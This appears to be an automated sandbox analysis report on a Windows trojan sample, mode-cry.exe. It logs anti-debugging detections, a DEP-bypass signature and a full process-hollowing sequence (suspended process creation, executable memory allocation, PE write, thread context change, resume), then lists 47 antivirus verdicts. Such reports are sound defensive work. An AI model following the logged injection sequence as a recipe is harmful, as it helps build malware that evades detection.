{u'size_of_data': u'0x0000c000', u'virtual_address': u'0x0006a000', u'entropy': 6.956021661933541, u'name': u'.rsrc', u'virtual_size': u'0x0000bfae'}

entropy

6.95602166193

description

A section with a high entropy has been found

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Nov. 17, 2021, 7:45 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Nov. 17, 2021, 7:45 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2148 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003f8		3221225496	0
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2148 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x001f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003f8	1	0	0

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Nov. 17, 2021, 7:45 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPEL³öSà \|pÔ@@.text{\| ` base_address: 0x001f0000 process_identifier: 2148 process_handle: 0x000003f8	1	1	0
WriteProcessMemory Nov. 17, 2021, 7:45 a.m.	buffer: base_address: 0x7efde008 process_identifier: 2148 process_handle: 0x000003f8	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Nov. 17, 2021, 7:45 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPEL³öSà \|pÔ@@.text{\| ` base_address: 0x001f0000 process_identifier: 2148 process_handle: 0x000003f8	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2768 called NtSetContextThread to modify thread in remote process 2148
NtSetContextThread Nov. 17, 2021, 7:45 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4314224 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000003f4 process_identifier: 2148	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2768 resumed a thread in remote process 2148
NtResumeThread Nov. 17, 2021, 7:45 a.m.	thread_handle: 0x000003f4 suspend_count: 1 process_identifier: 2148	1	0	0

Executed a process and injected code into it, probably while unpacking (14 events)

Time & API	Arguments	Status	Return
NtResumeThread Nov. 17, 2021, 7:45 a.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 2768	1	0
NtResumeThread Nov. 17, 2021, 7:45 a.m.	thread_handle: 0x00000158 suspend_count: 1 process_identifier: 2768	1	0
NtResumeThread Nov. 17, 2021, 7:45 a.m.	thread_handle: 0x00000194 suspend_count: 1 process_identifier: 2768	1	0
NtResumeThread Nov. 17, 2021, 7:45 a.m.	thread_handle: 0x00000218 suspend_count: 1 process_identifier: 2768	1	0
NtResumeThread Nov. 17, 2021, 7:45 a.m.	thread_handle: 0x0000022c suspend_count: 1 process_identifier: 2768	1	0
CreateProcessInternalW Nov. 17, 2021, 7:45 a.m.	thread_identifier: 2144 thread_handle: 0x000003f4 process_identifier: 2148 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\mode-cry.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\mode-cry.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\mode-cry.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000003f8	1	1
NtGetContextThread Nov. 17, 2021, 7:45 a.m.	thread_handle: 0x000003f4	1	0
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2148 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003f8		3221225496
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2148 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x001f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003f8	1	0
WriteProcessMemory Nov. 17, 2021, 7:45 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPEL³öSà \|pÔ@@.text{\| ` base_address: 0x001f0000 process_identifier: 2148 process_handle: 0x000003f8	1	1
WriteProcessMemory Nov. 17, 2021, 7:45 a.m.	buffer: base_address: 0x001f1000 process_identifier: 2148 process_handle: 0x000003f8	1	1
WriteProcessMemory Nov. 17, 2021, 7:45 a.m.	buffer: base_address: 0x7efde008 process_identifier: 2148 process_handle: 0x000003f8	1	1
NtSetContextThread Nov. 17, 2021, 7:45 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4314224 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000003f4 process_identifier: 2148	1	0
NtResumeThread Nov. 17, 2021, 7:45 a.m.	thread_handle: 0x000003f4 suspend_count: 1 process_identifier: 2148	1	0

File has been identified by 47 AntiVirus engines on VirusTotal as malicious (47 events)

Lionic	Trojan.MSIL.Androm.m!c
Elastic	malicious (high confidence)
DrWeb	Trojan.Inject4.19129
MicroWorld-eScan	Trojan.GenericKD.38001826
FireEye	Generic.mg.8cec5b455b359860
ALYac	Trojan.GenericKD.38001826
Cylance	Unsafe
K7AntiVirus	Trojan ( 00581a8a1 )
Alibaba	Trojan:Win32/Kryptik.ali2000016
K7GW	Trojan ( 00581a8a1 )
Cybereason	malicious.6819c2
BitDefenderTheta	Gen:NN.ZemsilF.34266.Cm0@aKukALlG
Cyren	W32/MSIL_Agent.CJD.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/Injector.VRN
TrendMicro-HouseCall	TROJ_FRS.0NA104KB21
Paloalto	generic.ml
Kaspersky	HEUR:Trojan-Spy.MSIL.Noon.gen
BitDefender	Trojan.GenericKD.38001826
Avast	Win32:PWSX-gen [Trj]
Ad-Aware	Trojan.GenericKD.38001826
Emsisoft	Trojan.GenericKD.38001826 (B)
Comodo	TrojWare.Win32.UMal.ahgoq@0
TrendMicro	TROJ_FRS.0NA104KB21
McAfee-GW-Edition	GenericRXQO-WD!8CEC5B455B35
SentinelOne	Static AI - Malicious PE
Sophos	Mal/Generic-S
Ikarus	Trojan.MSIL.Inject
Jiangmin	TrojanSpy.MSIL.bxuz
Avira	TR/Injector.xaent
Antiy-AVL	Trojan/Generic.ASMalwS.34CEB47
Kingsoft	Win32.Troj.Undef.(kcloud)
Gridinsoft	Ransom.Win32.Sabsik.sa
Microsoft	Trojan:Win32/AgentTesla!ml
GData	Trojan.GenericKD.38001826
Cynet	Malicious (score: 99)
AhnLab-V3	Trojan/Win.RATX-gen.C4766291
McAfee	GenericRXQO-WD!8CEC5B455B35
VBA32	TScope.Trojan.MSIL
Malwarebytes	Trojan.MalPack.MSIL
APEX	Malicious
MAX	malware (ai score=100)
MaxSecure	Trojan.Malware.73691310.susgen
Fortinet	MSIL/Injector.VRI!tr
AVG	Win32:PWSX-gen [Trj]
Panda	Trj/GdSda.A
CrowdStrike	win/malicious_confidence_100% (W)

mode-cry.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All